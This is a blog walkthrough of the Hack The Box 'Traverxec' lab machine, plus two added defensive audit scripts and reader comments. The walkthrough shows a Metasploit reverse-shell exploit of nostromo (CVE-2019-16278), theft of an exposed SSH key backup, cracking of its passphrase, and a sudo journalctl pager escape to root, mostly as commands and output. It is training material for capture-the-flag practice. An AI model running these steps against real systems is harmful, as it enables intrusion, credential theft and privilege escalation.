Hack The Box Traverxec Full Writeup – 10.10.10.165

So, I spawned Traverxec a while ago. This Linux machine is rated as an easy one.

I’m preparing a full writeup on this machine and planning to publish it within a couple of days; stay tuned until then.

The initial foothold and user were too easy! If you remember a recent CVE (CVE-2019-16278), the Metasploit exploit for it gives you an immediate shell. Once you are in, light enumeration gives you user.txt.

So here are the steps I followed:

User.txt


Update your msf and get the latest exploits and follow the steps below:

⚡  root@ns09  ~/htb/traverxec  msfconsole
[-] Starting The Metasploit Framework console...
[-] * WARNING: No database support: could not connect to server: Connection refused
	Is the server running on host "localhost" (127.0.0.1) and accepting
	TCP/IP connections on port 5432?

       =[ metasploit v5.0.60-dev                          ]
+ -- --=[ 1947 exploits - 1090 auxiliary - 333 post       ]
+ -- --=[ 556 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

msf5 > search nostromo

Matching Modules
================

   #  Name                                   Disclosure Date  Rank  Check  Description
   -  ----                                   ---------------  ----  -----  -----------
   0  exploit/multi/http/nostromo_code_exec  2019-10-20       good  Yes    Nostromo Directory Traversal Remote Command Execution


msf5 > use exploit/multi/http/nostromo_code_exec
msf5 exploit(multi/http/nostromo_code_exec) > set LHOST 10.10.14.9
LHOST => 10.10.14.9
msf5 exploit(multi/http/nostromo_code_exec) > set RHOST 10.10.10.165
RHOST => 10.10.10.165
msf5 exploit(multi/http/nostromo_code_exec) > exploit

[*] Started reverse TCP handler on 10.10.14.9:4444 
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened (10.10.14.9:4444 -> 10.10.10.165:49876) at 2019-11-19 10:43:08 +0300
shell

[*] Trying to find binary(python) on target machine
[*] Found python at /usr/bin/python
[*] Using `python` to pop up an interactive shell
ls

Now that I have a shell, I go to the home directory of user David, copy his SSH backup into a hidden directory I made under /tmp, and extract it, using the commands below.

$ ls /home/david/public_www/
ls /home/david/public_www/
index.html  protected-file-area
$ ls /home/david/public_www/protected-file-area
ls /home/david/public_www/protected-file-area
backup-ssh-identity-files.tgz
$ mkdir /tmp/.nav1n
mkdir /tmp/.nav1n
$ cd /tmp/.nav1n           
cd /tmp/.nav1n
$ cp /home/david/public_www/protected-file-area/backup-ssh-identity-files.tgz .
cp /home/david/public_www/protected-file-area/backup-ssh-identity-files.tgz .
$ tar -zxvf backup-ssh-identity-files.tgz
tar -zxvf backup-ssh-identity-files.tgz
home/david/.ssh/
home/david/.ssh/authorized_keys
home/david/.ssh/id_rsa
home/david/.ssh/id_rsa.pub
$ cat home/david//ssh/id_rsa
cat home/david//ssh/id_rsa
cat: home/david//ssh/id_rsa: No such file or directory
$ cat home/david/.ssh/id_rsa
cat home/david/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,477EEFFBA56F9D283D349033D5D08C4F
[... encrypted key body omitted ...]
-----END RSA PRIVATE KEY-----
$ 
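The foothold here relied on an SSH key backup sitting under a web-served directory. As an added check that is not part of the original writeup (the docroot layout and the sample archive are constructed for the demo), this script lists archives under a docroot whose members look like SSH private keys, so such backups are found in an audit before anyone else finds them:

```shell
#!/bin/sh
# Added example (not from the original writeup): audit a web docroot for archives
# that bundle SSH private keys, the way backup-ssh-identity-files.tgz did here.
# Paths and the sample archive below are constructed for the demo.

# Print "archive: member" for every archive member that looks like a private key
# (id_rsa, id_ed25519, ...); .pub files and authorized_keys are not flagged.
find_keys_in_archives() {
  docroot=$1
  find "$docroot" -type f \( -name '*.tgz' -o -name '*.tar.gz' -o -name '*.tar' \) |
  sort |
  while IFS= read -r archive; do
    # tar -tf lists members and auto-detects gzip on GNU and BSD tar
    tar -tf "$archive" 2>/dev/null |
    grep -E '(^|/)\.ssh/id_[a-z0-9]+$' |
    awk -v a="$archive" '{ print a ": " $0 }'
  done
}

# Build a throwaway docroot mirroring the layout seen on the box:
# docroot/protected-file-area/backup.tgz containing home/<user>/.ssh/id_rsa
make_sample_docroot() {
  root=$(mktemp -d)
  mkdir -p "$root/protected-file-area" "$root/stage/home/user/.ssh"
  printf 'PLACEHOLDER, not a real key\n' > "$root/stage/home/user/.ssh/id_rsa"
  printf 'ssh-rsa PLACEHOLDER\n' > "$root/stage/home/user/.ssh/id_rsa.pub"
  printf 'ssh-rsa PLACEHOLDER\n' > "$root/stage/home/user/.ssh/authorized_keys"
  printf '<html></html>\n' > "$root/index.html"
  (cd "$root/stage" && tar -czf "$root/protected-file-area/backup.tgz" home)
  rm -rf "$root/stage"
  printf '%s\n' "$root"
}

# Run the audit against the sample tree, then clean up.
demo() {
  root=$(make_sample_docroot)
  find_keys_in_archives "$root"
  rm -rf "$root"
}

demo
```

Point find_keys_in_archives at a real docroot (for nostromo, the htdocs directory and every homedirs_public tree) to get one line per exposed key.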

I copied the RSA private key to my Kali box and cracked its passphrase using John the Ripper.

⚡ ⚙  root@ns09~/htb/traverxec ls
exploit.sh  id_rsa  id_rsa.hash  ssh2john.py
⚡ ⚙  root@ns09~/htb/traverxec python ssh2john.py id_rsa > id_rsa.hash

John cracked the passphrase: “hunter”

 ⚡ ⚙  root@ns09 ~/htb/traverxec john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
hunter           (id_rsa)
1g 0:00:00:14 DONE (2019-11-19 10:58) 0.07007g/s 1005Kp/s 1005Kc/s 1005KC/sa6_123..*7¡Vamos!
Session completed

Getting user.txt

Once I had the passphrase, I SSHed into the box using the following command:

⚡ ⚙ root@ns09~/htb/traverxec ssh david@traverxec.htb -i id_rsa
Enter passphrase for key 'id_rsa': "hunter"
 ⚡ root@ns09~/htb/traverxec ssh david@10.10.10.165 -i id_rsa
Enter passphrase for key 'id_rsa': 
Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
Last login: Tue Nov 19 03:51:04 2019 from 10.10.14.9
david@traverxec:~$ ls
bin  journalctl  priv  public_www  user.txt
david@traverxec:~$ ct user.txt
-bash: ct: command not found
david@traverxec:~$ cat user.txt
7db0b[------------]82f3d
david@traverxec:~$ 

Privesc and Getting root.txt

User David’s bin directory has a bash script called “server-stats.sh” that collects log stats from the server. Its last line runs journalctl through sudo, and I will use that to get root.

david@traverxec:~$ cd bin
david@traverxec:~/bin$ ls
server-stats.head  server-stats.sh
david@traverxec:~/bin$ cat server-stats.sh
#!/bin/bash

cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat 
david@traverxec:~/bin$ 

After reading server-stats.sh, I understood how to run it 🙂

Now I resized the terminal to be as small as possible (this forces the output through the Linux pager; alternatively you can use the command “less”), ran the sudo journalctl command from the script, and typed !/bin/sh in the pager. Boom, I’m root.

david@traverxec:~$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Mon 2019-11-18 21:44:
Nov 18 22:30:48 traverxec sudo[1180]: 
Nov 18 22:30:50 traverxec sudo[1180]: 
Nov 18 22:30:50 traverxec sudo[1180]: 
Nov 18 22:30:50 traverxec sudo[1180]: 
Nov 18 22:30:52 traverxec crontab[1269
!/bin
/bin/bash: /bin: Is a directory
!done  (press RETURN)
...skipping...
Nov 18 22:30:50 traverxec sudo[1180]: 
Nov 18 22:30:50 traverxec sudo[1180]: 
Nov 18 22:30:52 traverxec crontab[1269
!/bin/sh
# ls
bin	    priv	user.txt
journalctl  public_www
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls
nostromo_1.9.6-1.deb  root.txt
# cat root.txt
9aa36[--------------]6e0d906
# 
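The privesc above works because the sudo rule lets journalctl reach a terminal, where it hands its output to a pager that accepts shell escapes. As an added defender-side check that is not part of the original writeup (the sudoers excerpt is constructed; the box's real rule is not shown on the page), this script flags sudo rules that run pager-capable commands without pinning --no-pager, and rules with wildcards:

```shell
#!/bin/sh
# Added example (not from the original writeup): flag sudo rules whose command
# will hand its output to an interactive pager when run on a terminal.
# The sudoers excerpt is constructed; the box's real rule is not shown on the page.

SUDOERS_SAMPLE='Defaults env_reset
# nostromo log viewer used by server-stats.sh
david ALL=(root) NOPASSWD: /usr/bin/journalctl -n5 -unostromo.service
# same rule with the pager pinned off
monitor ALL=(root) NOPASSWD: /usr/bin/journalctl --no-pager -n5 -unostromo.service
# wildcard lets the caller append their own arguments
backup ALL=(root) NOPASSWD: /usr/bin/less /var/log/nostromo/*'

# Commands that open $PAGER (or are a pager) when stdout is a tty.
PAGER_CMDS='journalctl systemctl less more man'

# Print one OK/WARN line per rule that involves a pager-capable command.
audit_sudoers() {
  printf '%s\n' "$1" | while IFS= read -r line; do
    case "$line" in ''|'#'*|Defaults*) continue ;; esac
    # keep only the command spec: strip "user host=", "(runas)" and "TAG:" parts
    spec=$(printf '%s' "$line" | sed -E 's/^[^=]*=//; s/^\([^)]*\) *//; s/^[A-Z]+: *//')
    cmd=${spec%% *}
    args=${spec#"$cmd"}
    base=${cmd##*/}
    case " $PAGER_CMDS " in *" $base "*) ;; *) continue ;; esac
    case "$spec" in
      *'*'*) echo "WARN: $spec (wildcard: caller can add arguments)"; continue ;;
    esac
    if [ "$base" = journalctl ] || [ "$base" = systemctl ]; then
      case "$args" in
        *--no-pager*) echo "OK: $spec" ;;
        *) echo "WARN: $spec (opens a pager on a tty; pin --no-pager in the rule)" ;;
      esac
    else
      echo "WARN: $spec ($base is an interactive pager)"
    fi
  done
}

audit_sudoers "$SUDOERS_SAMPLE"
```

The fix for the flagged rule is the pinned form shown for the constructed monitor user, with server-stats.sh changed to call that exact command line, since sudo matches arguments literally.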

Thanks for reading.

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: Profile: https://www.hackthebox.eu/nav1n

Andy Alfa
9 months ago

Hi, there are a few improvements I can see you can make to make your write-up more friendly: 1) How did you find out which vulnerability to use? 2) There is no explanation of how you got the SSH key directory. /home/david/ is not browsable (permission denied), so you need to find the internal browsable directory in another way. 3) “After reading the server-stats.sh, I understood how to run it 🙂” – what does this mean? There is no explanation. There is no reference to GTFOBins (or any other trick). Write-ups and challenges are used for education. So the person… Read more »

Anton Oleynik
6 months ago

1. In the docs for nostromo we can see how the structure works. In the config for nostromo we saw that the home directory for pages is home, so it works for every user:
homedirs /home
homedirs_public public_www
2. Just listing /home/david/public_www gives us the listing of the folder.
2.1 I went another way: I broke the hash from .htpasswd and didn’t know where to use this password, and after I found “protected-file-area” in ls, this page had a login system.
3. https://gtfobins.github.io/gtfobins/journalctl/
